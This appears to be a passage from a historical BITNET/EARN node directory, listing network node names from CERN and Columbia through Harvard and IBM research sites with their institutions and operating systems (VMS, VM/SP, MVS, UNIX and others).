+UNICC     CERN, Geneva, Switzerland                 IBM MVS/SP
+CERNEMU1  CERN, Geneva, Switzerland                 IBM VM/SP
+CEARNV2   CERN, Geneva, Switzerland                 IBM VM/SP
+AECLCR    Chalk River Nuclear Labs                  NOS
+CAS       Chemical Abstracts Srv                    ULTRIX-32
+FRCICG71  CICG, Grenoble                            BULL MULTICS
+FRGREN81  CICG, Grenoble, France                    CDC
+FRNICE51  CICNT, Nice, France                       VMS
+FRCIRP71  CICRP, Paris, France                      BULL MULTICS
+FRTOU71   CICT - Toulouse                           BULL MULTICS
+FRCICT81  CICT Toulouse, France                     CDC/NOS/VE
+EMDCIE51  CIEMAT                                    DEC VMS 4 7
+EMDJEN11  CIEMAT (Junta Energia Nuclear)            VM/SP
+IMICLVM   CILEA                                     VM/HPO
+IMICLVX   CILEA, Segrate - Milano, Italy            DEC VMS 4 5
+IMIVMHEP  CILEA, Segrate - Milano, Italy            IBM VM/HPO R4 2
+ICINECA2  CINECA                                    DEC VMS 4 7
+IBOINFN   CINECA - Bologna                          RSX11-M
+ICINECA3  CINECA - Bologna, Italy                   IBM VM/SP HPO R4 0
+ICINECA   CINECA Bologna                            IBM VM/SP HPO R4 2
+ICINECA1  CINECA, Bologna                           CDC NOS 2 4.1
+FRORS31   CIRCE, Orsay, France                      MVS/SP
+FRORS12   CIRCE, Orsay, France                      IBM VM/SP R4
+FRORS13   CIRCE, Orsay, France                      IBM VM/SP R4
+IMICISE   CISE - Milano, Italy                      IBM VM/SP HPO R3
+CITADEL   Citadel Military Co of SC                 VMS
+CITADEL1  Citadel Military Co of SC                 VMS
+CITADEL2  Citadel Military Co of SC                 VMS
+FRCITL71  CITI Lille                                BULL MULTICS
+FRCITI51  CITI 2                                    VAX VMS
+CLARGRAD  Claremont Grad School Comp Ctr            VMS
+CLARMATH  Claremont Grad School Math Dept.          VMS
+CLARKU    Clark Univ Off of Info Sys                VMS
+CLVM      Clarkson U ERC                            VM/SP
+CLVMS     Clarkson U ERC                            VMS
+CLUTX     Clarkson U ERC                            UTX/32
+CLGW      Clarkson U ERC                            UNIX
+CLMIE     Clarkson Univ MIE                         VMS
+CLEMSON   Clemson U Comp Ctr                        MVS/SP
+CSUOHIO   Cleveland State U Computer Svcs           VM/SP
+UTORCLSC  CLSC                                      VMS
+UTORSCS1  CLSC                                      VMS
+CMCHEM    CMU Chemistry Dept                        VMS
+CMCCVB    CMU Computing Services                    VMS
+ANDREW    CMU Computing Services                    UNIX
+CGECMU51  CMU Geneve                                DEC VMS
+CMPHYSME  CMU Med Energy Physics                    VMS
+CMPHYS    CMU Physics Dept                          VMS
+WACES     CMU Physics Dept                          VMS
+FRCRPE51  CNET/CRPE                                 VMS
+IPDCNR    CNR - Area di Ricerca, Padiva             DEC VMS
+IRMITSE   CNR ITSE Roma, Italy                      IBM VM/SP R3
+FRCGM51   CNRS - CGM                                VAX VMS
+FRCECM51  CNRS Ctr Metallurgique                    VMS
+FRUNIP11  CNRS-LITP, Paris, France                  VM/SP R5
+FRPOLY11  Cntr Info Ecole Polytech                  VM/SP
+ICNUCEVB  CNUCE - C N.R. Pisa, Italy                IBM VM/SP HPO R4 0
+ICNUCEVX  CNUCE - C N.R. Pisa, Italy                VMS 4 7
+FRMOP22   CNUSC - Montpellier                       MVS/XA
+FRMOP11   CNUSC Montpellier                         VM/SP
+FRMOP12   CNUSC, Montpellier                        VM/SP
+WMMVS     Col William and Mary Comp Ctr             MVS/SP
+WMHEG     Col William Mary Enrgy Grp                VMS
+CSHLAB    Cold Spring Harbor Lab                    VMS
+COLGATEU  Colgate Univ                              VMS
+FRCDF51   College de France, Paris                  DEC VMS
+CMR001    College militaire royal                   CP-6
+CODVM1    College of DuPage Comp. Srvs              VM/SP
+HLYCRSS1  College of the Holy Cross                 VM/SP
+HLYCROSS  College of the Holy Cross                 VMS
+MINES     Colorado Sch Mines                        VMS
+CSUGREEN  Colorado State U
+CSUGOLD   Colorado State U
+CSU205    Colorado State U                          VSOS 2.3
+COLOSTAT  Colorado State U
+CUCCVX    Columbia U Admin Dept                     VMS
+CUGSBVAX  Columbia U Bus Sch Futures Ctr            VMS
+CUCHEM    Columbia U Chemistry Dept                 VMS
+CUCHMB    Columbia U Chemistry Dept                 VMS
+CUCEVX    Columbia U Civil Eng.                     VMS
+CUCCA     Columbia U Cluster Ctrl A                 UNIX BSD
+CUCSVM    Columbia U Comp Sci                       VM/SP
+CUNIXC    Columbia U Ctr Cmptng. Act.               ULTRIX
+CUVMC     Columbia U Ctr for Comp Activities        VM/SP
+CUVMA     Columbia U Ctr for Comp Activities        VM/SP
+CUVMB     Columbia U Ctr for Comp Activities        VM/SP
+CUMIN     Columbia U Ctr for Comptng Act            VMS
+CUGSBVM   Columbia U Grad Sch Business              VM/SP
+CUCCFA    Columbia U Health Sciences                VMS
+CUHSDA    Columbia U Health Sciences                VMS
+CUMBG     Columbia U Molecular Biophy. Graph        VMS
+CUORCA    Columbia U Orthopaedic Res Clust A        VMS
+CUORMB    Columbia U Orthopaedic Res Clust A        VMS
+CUORMA    Columbia U Orthopaedic Res Micro A        VMS
+CUPHYD    Columbia U Physics Dept                   VMS
+CUSB      Columbia U Stony Brook Exp - CESR         VMS
+CUTCV1    Columbia U Teachers Coll                  VMS
+CUTHRY    Columbia U Theoretical Phys               VMS
+CUCISA    Columbia Univ Ctr for Clinical Res        VMS
+UTKVX     Computing Center                          VMS
+CONU1     Concordia U Computing Ctr                 NOS
+CONU2     Concordia U Computing Ctr                 VMS
+CONNCOLL  Connecticut Coll                          ULTRIX
+CTSTATEU  Connecticut State Univ Sys                VMS
+IRMCNR    Consig Naz Richerche - Roma               IBM VM/SP R3
+DKCBS01   Copenhagen Business School, DK            PRIMOS
+DKTC11    Copenhagen Technical College              IBM VM/SP
+CRNLION   Cornell Lab of Plasma Stud                ULTRIX
+CORNELLA  Cornell U Computer Services               VM/SP/HPO
+CORNELLC  Cornell U Computer Services               VM/SP/HPO
+CRNLASTR  Cornell U Dept of Astronomy               VMS
+CRNLCS    Cornell U Dept of Computer Science        UNIX BSD
+CRNLGSM   Cornell U Grad Sch of Mgmt                VMS
+CRNLNS    Cornell U Lab of Nuclear Studies          VMS
+CRNLIMAP  Cornell U Mech Eng                        VM/SP
+CUMC      Cornell U Medical College                 VM/SP
+CORNELLF  Cornell U Production Supercomp Facil      VM/XA/SF
+CORNELLD  Cornell U Supercomputer Facil             VM/SP/HPO
+CRNLCAM   Cornell Univ CAM                          UNIX BSD
+CRNLVAX2  Cornell Univ Comp Servs                   UNIX BSD
+CRNLVAX3  Cornell Univ Comp Servs                   ULTRIX
+CRNLVAX4  Cornell Univ Comp Servs                   ULTRIX
+CRNLVAX1  Cornell Univ Comp Srvs                    UNIX BSD
+CRNLVAX5  Cornell Univ Comp Svcs                    VMS
+CRNLMVS   Cornell Univ Computer Srvs                MVS/SP
+CRNLDEV   Cornell Univ Ctr Theory & Simul in Sci & EUNIX BSD
+CRNLCHES  Cornell Univ HESS                         VMS
+CRNLASSP  Cornell Univ LASSP                        UNIX BSD
+CRNLNUC   Cornell Univ LNS                          SUNOS UNIX
+CRNLMSC2  Cornell Univ Materials Sci Ctr            CONVEX UNIX
+CRNLMSC3  Cornell Univ Materials Sci Ctr            CONVEX UNIX
+CRNLEE    Cornell Univ Sch Elec Eng                 UNIX BSD
+CRNLTHRY  Cornell Univ Theory Ctr.                  UTX/32
+FRIHRO21  CRIH de Haute Normandie                   MVS
+FRIHVG11  CRIH de Villeneuve St. George             VM/SP
+FRCRN51   CRN - DIHE, France                        DEC VMS
+ITOCSIP   CSI Piemonte, Torino, Italy               IBM MVS/SP 3 8
+ILCTEHOL  CTE, HOLON                                VMS
+SECTHF51  CTH Gothenburg, Sweden                    DEC VMS
+FRCTHO11  CTHO, Orsay, France                       IBM VM/SP
+GRPATVX1  CTI, Computer Engineering Dept            VMS
+CATE      Ctr for Adv Tech Educ                     VM/SP
+BBADMIN   CUNY - Baruch Col Admin Comp Ctr          VM/SP
+BBADMIN2  CUNY - Baruch Col Admin Comp Ctr          VM/SP
+BARUCH    CUNY - Baruch College                     VM/SP
+BMACADM   CUNY - Bor of Manhattan Comm Col          VM/SP
+BM002     CUNY - Bor of Manhattan Comm Col Adm      VM/SP
+BX001     CUNY - Bronx Community College            VM/SP
+BKLYN     CUNY - Brooklyn College                   VM/SP
+BKLYNMVS  CUNY - Brooklyn College                   MVS/SP
+BKLYNCIS  CUNY - Brooklyn College                   UNIX
+CCNY      CUNY - City College of New York           VM/SP
+CCNYVME   CUNY - City College of New York           VM/SP
+CCNYSCI   CUNY - City College of NY                 UNIX
+CCNYVAX1  CUNY - City College of NY                 VMS
+SI001     CUNY - Col of Staten Island               VM/SP
+CUNYVMS1  CUNY - Graduate Center                    VMS
+HUNTER    CUNY - Hunter College                     VM/SP
+KB001     CUNY - Kingsborough Comm Col              VM/SP
+LEHMAN    CUNY - Lehman College                     VM/SP
+NY001     CUNY - New York City Tech Col             VM/SP
+QUEENS    CUNY - Queens College                     VM/SP
+QB001     CUNY - Queensborough Comm Col             VM/SP
+CUNYJES3  CUNY - University Computer Ctr            MVS/SP
+YORK      CUNY - York College                       VM/SP
+CUNYVM    CUNY University Computer Ctr              VM/SP/HPO
+CUNYVMV2  CUNY University Computer Ctr              VM/SP/HPO
+HOSTOS    CUNY University Hostos Comm. Coll         VM/SP
+JJAYVM    CUNY University John Jay. Coll            VM/SP
+LAGCC     CUNY University LaGuardia Comm. Coll      VM/SP
+MEDGAR    CUNY University Medgar Evers Coll         VM/SP
+MCVAX     CWI Amsterdam                             UNIX
+FRDRFG01  D.R.F. , Grenoble, France                 PRIMOS REV 21
+SDNET     Dakota State College                      VM/SP
+DAL       Dalhousie U Comp Cntr                     NOS
+DALAC     Dalhousie University UCIS                 VMS
+DALADM    Dalhousie University UCIS                 MVS/SP
+DKDHI11   Danish Hydraulic Inst                     IBM VM/SP
+DKSFI11   Danish Ntl Inst Social Res                IBM VM/SP R3
+DARTCMS1  Dartmouth College Kiewit CC - CMS1        VM/SP
+DAVIDSON  Davidson Coll                             VMS
+DEPAUL    De Paul Univ                              VMS
+DEPAULC   De Paul Univ                              VMS
+DEPAULO   De Paul Univ                              VMS
+DECUSA    DECUS Symposium Demo Node                 VMS
+DECUSB    DECUS Symposium Demo Node                 VMS
+DECUSC    DECUS Symposium Demo Node                 VMS
+DECUSD    DECUS Symposium Demo Node                 VMS
+DECUSE    DECUS Symposium Demo Node                 VMS
+DECUSF    DECUS Symposium Demo Node                 VMS
+DECUSG    DECUS Symposium Demo Node                 VMS
+DECUSH    DECUS Symposium Demo Node                 VMS
+DECUSI    DECUS Symposium Demo Node                 VMS
+DECUSJ    DECUS Symposium Demo Node                 VMS
+D00DEMO   Demo Node Germany
+DENISON   Denison Univ                              VMS
+FRULM63   Dept Math ENS Paris                       UNIX
+JPNKBUDS  Dept of Systems Eng                       VM/SP
+DHHDESY3  DESY                                      MVS/SP
+DFVLROP1  Deutsche FVLR Oberpfaffenhofen            IBM VM/SP HPO
+DHDDKFZ1  Deutsches Krebsforschungszentr            IBM VM/SP HPO R4 2
+DFNGATE   DFN Gateway at GMD DA, Germany            IBM VM/SP R4
+DFVLRBS1  DFVLR Braunschweig                        IBM VM/SP HPO
+DFVLRGO1  DFVLR Goettingen                          IBM VM/SP HPO
+DFVLRKP1  DFVLR Koeln-Porz                          IBM VM/SP HPO
+DFVLRLA1  DFVLR Lampoldshausen, Germany             IBM VM/IS
+DFVLROP2  DFVLR Oberpfaffenhofen                    IBM MVS/XA
+DFVLRST1  DFVLR Stuttgart                           IBM VM/SP HPO
+DKDHI12   DHI, Horsholm, Denmark                    IBM VM/SP
+DICKINSN  Dickinson College                         VMS
+IFICHIM   Dip. di Chimica Firenze, Italy            VM/SP
+ITOINFO   Dip. Informatica Torino, Italy            UNIX 4 2
+IPIINFO   Dip. Informatica Univ Pisa                UNIX BERKELEY
+IRM2CIV   Dip. Ingen. Civile Univ Roma 2            VM/SP
+IPIFIDPT  Dipartimento di Fisica, Pisa              IBM VM/SP HPO R5
+DB0DIW11  DIW Berlin                                VM/SP
+HLSDNL50  DNL Leidschendam                          VMS 4 6
+HLSDNL5   DNL Leidschendam, Netherlands             VMS 4 6
+HLSDNL51  DNL Leidschendam, Netherlands             VMS 4 6
+DKDOU01   DOU, Odense, Denmark                      SPERRY OS 1100
+DRAKE     Drake Univ                                VMS
+DREW      Drew Univ                                 VMS
+DRUNIVAC  Drew Univ                                 VMS
+DUPR      Drexel Univ Off Cmptng Srvs               PRIMOS
+DUVM      Drexel University                         VM/SP
+DUPHY1    Drexel University                         VMS
+DUKEFSB   Duke U FUQUA Bus Sch                      VM/SP
+DUKE      Duke University                           MVS/SP
+FREMBL51  E.M.B.L. Grenoble, France                 VMS
+FRERB51   E.N.S.E.R.B., Talence, France             DEC VMS
+FRENSL61  E.N.S.L                                   UNIX BSD 4 2
+EBESADE0  E.S.A.D.E. Barcelona - Spain              AOS/VS
+EARNWRLD  EARN Demonstration node                   VAX/VMS
+ECUVM1    East Carolina Univ Comp & Info Sys        VM/HPO
+ETSU      East Tennessee St. Univ                   VM/SP
+ETSUACE   East Tennessee St. Univ                   VM/SP
+EWCN      East-West Center                          VMS
+ECLACSVM  ECLA, Computer Center                     VM
+FRECCL11  Ecole Centrale de Lyon, France            IBM VM/SP R4
+FRECP11   Ecole Centrale de Paris                   IBM VM/SP R4
+FREMP11   Ecole des Mines Paris                     VM/SP
+FRHEC11   Ecole Hautes Et Commer Paris              IBM VM/SP R4 0
+FRULM11   Ecole Normale Super Paris                 IBM VM/SP
+FRULM52   Ecole Normale Superieure Paris            VMS
+POLYTEC1  Ecole Polytechnique                       MUSIC
+POLYTEC2  Ecole Polytechnique                       MUSIC
+POLYTEC3  Ecole Polytechnique                       MUSIC
+POLYTECA  Ecole Polytechnique VM                    VM/SP
+FRESCR51  Ecole Sup de Commerce                     DEC VMS
+FRESE51   Ecole Super d'Elec                        DEC VMS
+IECSEC    ECSEC IBM Rome                            IBM VM/SP HPO 3 4
+RUIPC1E   EDS Deutschland GmbH, Germany             IBM MVS/XA 2 1.3
+ECNCDC    Edu Computing Network of IL               NOS
+CIEARN    Educat & Research, Ivory Coast            VM/SP
+EDUCOM    EDUCOM                                    VMS
+EDUCOM2   EDUCOM                                    VM/SP
+AMBER88   EDUCOM '88 Prime Demo                     PRIMOS
+EDUCOMDW  EDUCOM 88 Conf. Demo Node                 VMS
+EDUCOM88  EDUCOM 88 Conf. Demo Node                 VMS
+AWIUNI11  EDV Zentrum U Wien                        IBM VM/SP HPO R4 2
+AWIBOK01  EDV-Zentrum Boku Wien                     PRIMOS
+AWITUW02  EDV-Zentrum TU Wien                       NOS/VE 1 3.1
+AWITUW01  EDV-Zentrum TU Wien                       NOS/VE 1 3.1
+AINUNI01  EDV-Zentrum Uni Innsbruck                 NOS/VE 1 3
+TREARN    Ege Univ                                  VM/SP
+CLSEPF51  Eid Tech Hoch Lausanne                    DEC VMS
+CZHETH5A  Eidgen Tech Hoch Zuerich                  VMS
+CAGEIR5A  EIR, Wuerenlingen, Switzerland            VMS
+EPRI      Electric Power Res Inst                   VM/SP
+DHHEMBL5  EMBL Hamburg, Germany                     DEC VMS 4 6
+DHDEMBL   EMBL Heidelberg, Germany                  VMS
+EMUVM1    Emory U Comp Ctr - VM1                    VM/SP
+EMUVM2    Emory U Comp Ctr - VM2                    VM/SP
+EMORYU1   Emory U Comp Ctr UNIX1                    UNIX BSD
+EMORY     Emory U Math and CS                       BERKELEY UNIX
+EMRYCC    Emory Univ Comp Ctr VMS VAX               VMS
+EMORYU2   Emory Univ Comptng Ctr                    UNIX
+EMRCAN    Energy Mines & Resources Can              VMS
+HPEENR51  ENR, Petten, Netherlands                  VAX VMS
+HROEUR5   Erasmus U Rotterdam                       VMS 4
+ESOC      ESA ESOC, Darmstadt, Germany              IBM VM/SP HPO R5 0
+HNOESA10  ESA Europ Space Res Tech Ctr              VM/SP 4 2
+IFRESA10  ESA/ESRIN Frascati, Italy                 IBM VM/SP R4
+FRESA10   ESA, France                               IBM VM/SP R3 1
+DGAESO51  ESO, Garching                             VMS
+ESASTSP   ESTEC / STSP Project                      VM/SP HPO4 2
+FRESTP11  ESTP, Paris, France                       VM/SP
+CZHETH1I  ETH und Uni Zuerich IBT                   IBM VM/SP HPO 5 0
+CZHETH1B  ETH Zuerich Bibliotek                     IBM VM/SP HPO 5 0
+CZHETH1C  ETH Zuerich IKB                           IBM VM/SP HPO 5 0
+CZHETH1A  ETHZ/IHP                                  IBM VM/SP HPO 4 2
+ROSEDALE  ETS                                       VMS
+DHDEMBL5  European Molecular Biology Lab            VMS
+ITSOGS    Exp. Geophys. Observ. Trieste             IBM VM/SP R4
+ERENJ     Exxon Res & Eng Co                        VM/SP
+EREVAX    Exxon Res & Eng Co                        VMS
+FRFUPL11  F.U.P.L. de Lille, France                 IBM VM/SP R4
+IFISTAT   Fac. Econ e Comm Firenze                  IBM VM/SP R5
+DAAFHT1   Fachhochschule Aalen                      VM/SP
+DHNFHS1   Fachhochschule Heilbronn                  IBM VM/SP R3
+DKAFHS1   Fachhochschule Karlsruhe                  IBM VM/SP R4
+DMAFHT1   Fachhochschule Technik Mannheim           IBM VM/SP R4 0
+DWIFH1    Fachhochschule Wiesbaden                  IBM VM/SP R3
+BNANDP11  Facultes U Notre Dame de la Paix Namur BelVM/SP R5
+BNANDP10  Facultes U Notre Dame Namur               VM/SP R5
+IRMFAO00  FAO                                       IBM VM/SP R4 2
+DULFAW1A  FAW Ulm, Germany                          VM/SP R4 5
+DS0FBD11  FBD - Schulen Gemein GMBH                 IBM VM/SP R3
+FDACFSAN  FDA, CFSAN                                VM/SP
+FNALA     Fermi Natl Accelerator Lab                VMS
+FNALDBG   FERMI Natl Accelerator Lab                VMS
+FNAL      Fermilab                                  VMS
+FNALB     Fermilab                                  VMS
+FNALBSN   Fermilab                                  VMS
+FNALB0    Fermilab                                  VMS
+FNALC     Fermilab                                  VMS
+FNALCDF   Fermilab                                  VMS
+FNALNET   Fermilab                                  VMS
+FNALVM    Fermilab                                  VM/SP
+FNMFE     Fermilab                                  VMS
+FNALG     Fermilab                                  VMS
+FNALJ     Fermilab                                  VMS
+FNALF     Fermilab                                  VMS
+FNALE     Fermilab                                  VMS
+FNALMDTF  Fermilab                                  VMS
+FNAL01    Fermilab                                  VMS
+FNAL03    Fermilab                                  VMS
+FNAL05    Fermilab                                  VMS
+FNAL17    Fermilab                                  VMS
+FNAL26    Fermilab                                  VMS
+FNAL27    Fermilab                                  VMS
+FNACP     Fermilab                                  VMS
+FNBIT     Fermilab                                  VMS
+FNALH     Fermilab                                  VMS
+FNALI     Fermilab                                  VMS
+FNALK     Fermilab                                  VMS
+FNCCF     Fermilab                                  VM
+FNALAD    FERMILAB Ntl Lab                          VMS
+DHAFEU51  Fern-Uni Hagen (Informatik)               VMS
+DHAFEU61  Fern-Uni Hagen (Informatik)               UNIX BSD
+DHAFEU11  Fernuniversitaet Hagen                    IBM VM/SP R4
+DHAFEU52  Feruniversitaet Hagen                     DEC VMS 4 7
+FINFUN    Finnish S Comp Ctr Espoo                  DEC VMS 4 1
+TRFIRAT   Firat Univ                                VM/SP R 3
+FSUSFS    Fl St U Spr-comp Frnt-end Sys             NOS
+FSURAI    FL State U Rsrch Instrtnl Sys             NOS
+FSUSUP    FL State U Super Comp Sys                 VSOS
+NERVM     Florida NE Reg Data Ctr                   VM/SP
+NER       Florida NE Reg Data Ctr                   MVS/XA
+FSU       Florida State U                           VM/SP
+BEARN2    FNRS/NFWO, Brussels, Belgium              VM/SP
+FORDMULC  Fordham Univ                              VMS
+FORDMURH  Fordham Univ                              VMS
+FANDM     Franklin and Marshall Coll                VMS
+FANDMA    Franklin and Marshall Coll                VMS
+FANDMB    Franklin and Marshall Coll                VMS
+FANDMC    Franklin and Marshall Coll                VMS
+FHCRCVM   Fred Hutchinson Cancer Res Ctr            VM/SP
+FHCRCVAX  Fred Hutchinson Cancer Res Ctr Div Clin ReVMS
+DB0DSS81  Freie Universitaet Berlin                 SIEMENS BS2000
+DB0FHI01  Fritz Haber Institut der Max Planck GesellCDC NOS/BE 1 5
+FIPORT    FSCC, Espoo, Finland                      DEC VMS
+DB0FUB03  FU Berlin ZEDAT CDC                       CDC NOS/BE 1 5
+DB0FUB11  FU Berlin ZEDAT CDC, Germany              IBM VM/SP
+GALLUA    Gallaudet Univ Comp Svcs                  VMS
+GALLUB    Gallaudet Univ Comp Svcs                  VMS
+GALLUE    Gallaudet Univ Comp Svcs                  VMS
+FRGAN01   GANIL, Caen, France                       MAX32 REV A 1
+GECRDVM1  GE R&D                                    VM/SP
+CGEHCU61  Geneva Hospital, Switzerland              UNIX
+GMUVAX    George Mason U                            VMS
+GWUVM     George Washington U Comp Ctr              VM/SP
+GUVM      Georgetown U Acad CMS                     VM/SP
+GUVAX     Georgetown U Acad VAX                     VMS
+GSUMVS1   Georgia State U - MVS1                    MVS/XA
+GSUVM1    Georgia State U - VM1                     VM/SP
+GSUVM2    Georgia State Univ CC VM2                 VM/SP
+GITVM2    Georgia Tech CAE/CAD Lab                  VM/SP
+GITCDC1   Georgia Tech Comp Svcs                    NOS
+GITCDC2   Georgia Tech Comp Svcs                    NOS
+GITNVE2   Georgia Tech Comp Svcs                    NOS/VE
+GITATT1   Georgia Tech Computing Svcs               UNIX SYSTEM V
+GITVM1    Georgia Tech Computing Svcs               VM/SP/HPO
+GTRI01    Georgia Tech Research Inst.               VM/SP
+DBNGMD21  Ges. Mathematik Datenv Bonn               MVS/SP
+DDAGMD11  Ges. Mathematik Datenv Darmstadt          IBM VM/SP R4
+DEARN     Gesellschaft fuer Schwerionenf            IBM VM/SP R5
+DDAGSI3   Gesellschaft fuer Schwerionfor            IBM MVS/XA 2 1.3 VFE
+FRGETA11  GETA                                      VM/SP
+GBURG     Gettysburg Coll                           VMS
+DGHGKSS4  GKSS, Geesthacht, Ger                     SIEMENS BS3000 E 40
+DBNGMD12  GMD Bonn, Germany                         IBM VM/SP R5
+SEGUC11   Gothenburg U Comp Ctr                     IBM VM/SP R2
+SEGUC21   Gothenburg U Comp Ctr                     IBM MVS/SP 1 3.3
+UKACRL    Great Britain EARN London                 IBM VM/SP R3
+FRPROG61  GRECO Programmation Bordeaux              UNIX
+GRIN2     Grinnell College - Admin                  VMS
+GRIN1     Grinnell College Academic                 VMS
+FRGAG51   Groupe Astrophysique Grenoble             VMS
+DGAGRS2A  GRS Garching                              IBM MVS/XA
+DK0GRS11  GRS Koein                                 VM/SP
+DM0GSF11  GSF Muenchen                              VM/SP
+DM0GSF51  GSF-MEDIS                                 VMS
+DDAGSI5   GSI Darmstadt VAX                         DEC VMS 4 3
+DDAGSI1   GSI Darmstadt, Germany                    IBM VM/SP R4 0
+DDAGSI1O  GSI Darmstadt, Germany                    IBM VM/SP R4 0
+GACVAX1   Gustavus Adolphus Coll                    VMS
+DGOGWDG1  GWD Goettingen, Germany                   IBM VM/SP R4
+DGOGWDG5  GWD Goettingen, Germany                   DEC VMS
+GWUVAX    GWU - School of Eng.                      VMS
+SEASVM    GWU - School of Eng. IBM                  VM/SP
+HADASSAH  Hadassah U Hospital                       DEC VMS
+DB0HMI41  Hahn-Meitner-Institut Kerforschung        SIEMENS BS3000 MSP 10
+HAIFAUVM  Haifa University                          IBM VM/SP R4 1
+HAMPVMS   Hampshire College                         VMS
+KRHYUCC1  Hanyang Univ                              VMS
+HUSC5     Harvard HASCS                             VMS
+HUSC2     Harvard HASCS                             BSD UNIX 2.9
+HUARP1    Harvard U Atmos Res Project               VMS
+HARVBMB   Harvard U Biochem & Molecul Bio           UNIX BBN
+HARVJMMY  Harvard U Biostat Res Cmptng              ULTRIX
+HARVBUS1  Harvard U Bus Sch                         VM/SP
+HUCHE1    Harvard U Chemistry VAX1                  VMS
+HARVARD   Harvard U Computer Science                UNIX BSD
+CFA2      Harvard U Ctr Astrophysics                VMS
+CFA3      Harvard U Ctr Astrophysics                VMS
+CFA       Harvard U Ctr Astrophysics                VMS
+CFAAMP    Harvard U Ctr Astrophysics                VM/SP
+CFA4      Harvard U Ctr Astrophysics                VMS
+CFA5      Harvard U Ctr Astrophysics                VMS
+CFA6      Harvard U Ctr Astrophysics                VMS
+CFA7      Harvard U Ctr Astrophysics                VMS
+CFA8      Harvard U Ctr Astrophysics                VMS
+CFAPS2    Harvard U Ctr Astrophysics                VMS
+HARVPCNA  Harvard U Faculty Arts & Sciences         MS-DOS
+HUGSE1    Harvard U Grad Sch of Ed                  VMS
+HARVHEP   Harvard U High En Physics Lab             VMS
+HUHEPL    Harvard U High Energy Physics             VMS
+HUXTAL    Harvard U Mole Bio Cmptng.                VMS
+HARVARDA  Harvard U OIT                             VM/SP
+HUSSLE    Harvard U Physics Dept                    VMS
+HARVUNXW  Harvard U Psychology Dept                 UNIX BSD
+HARVUNXC  Harvard U Psychology Dept                 UNIX
+HARVUNXU  Harvard U Science Center                  UNIX BSD
+HUSC6     Harvard U Science Ctr                     UNIX
+HULAW1    Harvard U Science Ctr                     VMS
+HUSC3     Harvard U Science Ctr                     VMS
+HUMA1     Harvard U Science Ctr                     UNIX BSD
+HUSC7     Harvard U Science Ctr                     ULTRIX
+HUSC8     Harvard U Science Ctr                     ULTRIX
+HUSCGW    Harvard U Science Ctr BITNET Mail Gtwy    VMS
+HARVUNXT  Harvard U Sociology Dept                  UNIX BSD
+HARVSPHA  Harvard Univ Health Sci. Cmptng. Fac.     ULTRIX
+HARVSPHB  Harvard Univ Health Sci. Cmptng. Fac.     ULTRIX
+FOURCC    Harvey Mudd Col Comp Services             VMS
+HMCVAX    Harvey Mudd Col Comp Srvs                 VMS
+ECHMC     Harvey Mudd Col Eng Dept                  VMS
+FROSH     Harvey Mudd Col Eng Dept                  VMS
+YMIR      Harvey Mudd Col Math Dept                 VMS
+HECMTL01  Hautes Etudes Commerciales
+HVRFORD   Haverford Col Acad Comp Ctr               VMS
+DKHHA     HDC Aarhus                                VMS
+HUJINIX   Hebrew U Comp Cnt Unix                    UNIX BSD 4 2
+HBUNOS    Hebrew U Comp Ctr                         NOS
+HUJIVMS   Hebrew U Comp Ctr                         DEC VMS
+HUJICS    Hebrew U Computer Sci                     UTX 32
+HUJIAGRI  Hebrew U Faculty of Agriculture           DEC VMS
+HUJIFH    Hebrew U Fritz Haber Molec Dyna Ctr       UNIX BSD 4 2
+HUMUS     Hebrew U Jerusalem Comp Sc                UNIX BSD 4 2
+HUJINOS2  Hebrew U Jerusalem, Israel                NOS
+HUJIMD    Hebrew U Medical School                   DEC VMS
+BATATA    Hebrew U Molecular Ctr                    UNIX BSD 4 2
+HUJIPRMA  Hebrew U Mount Scopus Comp Ctr            PRIMOS
+HUJIPRMB  Hebrew U Mount Scopus Comp Ctr            PRIMOS
+HUJIVM1   Hebrew University                         VM/CMS
+FINGATE   Helsinki U Tech                           UNIX
+FINHUTA   Helsinki U Tech                           IBM VM/SP R4
+FINHUTC   Helsinki U Tech Finland                   IBM VM/SP R4
+FINHUT    Helsinki Univ of Tech                     IBM VM/SP R5
+FINHUTCS  Helsinki University of Techn              UNIX 4 3 BSD
+FINHUTEE  Helsinki University of Techn              UNIX 4 3 BSD
+FINHUTIT  Helsinki University of Techn              UNIX 4 3 BSD
+JPNHIROA  Hiroshima Univ                            VM/HPO
+DDATHD21  Hoch TH Darmstadt                         MVS/SP
+DDOHRZ11  Hoch U Dortmund                           IBM VM/SP R3
+DHDIHEP5  Hochenergiephysik                         VMS
+DHIURZ1   Hochschule Hildesheim Germany             IBM VM/SP R4
+HOFSTRA   Hofstra Univ                              VMS
+HUMAIN    Howard Univ Central Comp                  MVS
+HSETC     HSETC                                     VM/SP HPO
+HUJIDS    HUJI Dental School                        DEC MICROVMS
+HUMBER    Humber College                            VM/SP
+IRMIAS    I Astrofisica Spaziale                    VM/SP
+IFIIDG    I Document Giurid Firenze                 VM/SP
+ITOIMGC   I Meteorologia Colonnetti                 VM/SP
+IRMCRA    I Richerche Aerospaziali                  IBM VM/SP
+IPVIAN    I.A.N.-CNR, Pava, Italy                   VM/SP
+IGEICE    I.C.E.-CNR, Genova, Italy                 CDC NOS 2 4.2
+FRILL52   I.L.L. , Grenoble, France                 DEC VMS
+FRILL     I.L.L. , Grenoble, France                 DEC VMS
+FRIMFT11  I.M.F.                                    VM/SP
+FRURBB51  I.N.S.E.R.M.                              DEC VMS
+FROPT11   I.O.T.A                                   IBM VM/IS
+TRITU     I.T.U                                     VM/SP R3
+FRPGM11   I.U.T. Progem                             VM/SP
+AWIIAE21  IAEA                                      IBM MVS/XA 2 1.3
+IRMIASI   IASI CNR Roma, Italy                      DEC VMS V4 5
+ALMCSVM1  IBM Almaden Res Ctr                       VM/SP
+ALMCSVM2  IBM Almaden Res Ctr                       VM/SP
+ALMCSVM6  IBM Almaden Res Ctr                       VM/SP
+ALMCSVS5  IBM Almaden Res Ctr                       VM/SP
+ALMVMA    IBM Almaden Res Ctr                       VM/SP
+ALMVMB    IBM Almaden Res Ctr                       VM/SP
+ALMVMC    IBM Almaden Res Ctr                       VM/SP
+ALMVMZ    IBM Almaden Res Ctr                       VM/SP
+IBMLABNN  IBM Canada Labs
+ISRAEARN  IBM Israel SC - Haifa                     IBM VM/SP R3
+DS0LILOG  IBM LILOG Project Stuttgart               IBM VM/SP R3
+ZURLVM1   IBM Research Lab Zurich                   IBM VM/SP
+EMDCCI11  IBM Scientific Center Madrid              IBM VM/SP R4
+JPNTSCVM  IBM Tokyo Research                        VM/SP
+VNET      IBM VNET Gateway                          VM/SP
+YKTVMV    IBM Watson Sci Res Ctr                    VM/SP
+WATSON    IBM Watson Sci Res Ctr                    VM/SP
